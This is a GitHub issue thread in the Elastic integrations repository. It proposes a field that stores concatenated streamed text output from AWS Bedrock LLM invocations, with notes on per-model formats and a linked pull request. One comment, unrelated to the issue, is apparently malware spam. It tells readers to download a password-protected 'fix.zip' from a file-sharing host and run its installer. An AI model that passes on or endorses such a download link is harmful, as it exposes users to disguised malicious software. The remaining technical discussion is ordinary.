### ISSUE TITLE
[AWS Bedrock] Store stream (text) output in a string format. 

### ISSUE THREAD

**Issue by agithomas** [elastic/integrations#10875]
The `gen_ai.completion` field holds the return value of the LLM invocation, especially with text models. 

This field may have two types of values: string or JSON representing an array of objects. 

String value fields are easy to interpret. However, when the value is stored as JSON (array of LLM tokens), it is difficult to easily interpret the actual response. JSON sample below

The enhancement  is for addressing the following requirements

- Create a new field having field name `aws_bedrock.invocation.completion_text` to store the concatenated `delta.text` value in `gen_ai.completion`. 
- Create / Modify dashboard panels in the AWS Bedrock Overview dashboard with information of LLM requests and responses when the response is text/stream of output tokens.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by agithomas** [comment]
What I have observed is, the value of `aws_bedrock.invocation.output.output_body_json` vary with the models.  Following models are considered for compatibility 

- Titan
- Anthropic
- Lllam3
- Mistral

The value of the processed `aws_bedrock.invocation.output.output_body_json` will be held in field named `aws_bedrock.invocation.output.completion_text`

**Comment by agithomas** [comment]
View details



![Image](https://github.com/user-attachments/assets/2ba3e733-9f22-4428-b3a9-42dcd179cba0)

**Comment by agithomas** [comment]
PR Details : https://github.com/elastic/integrations/pull/10939
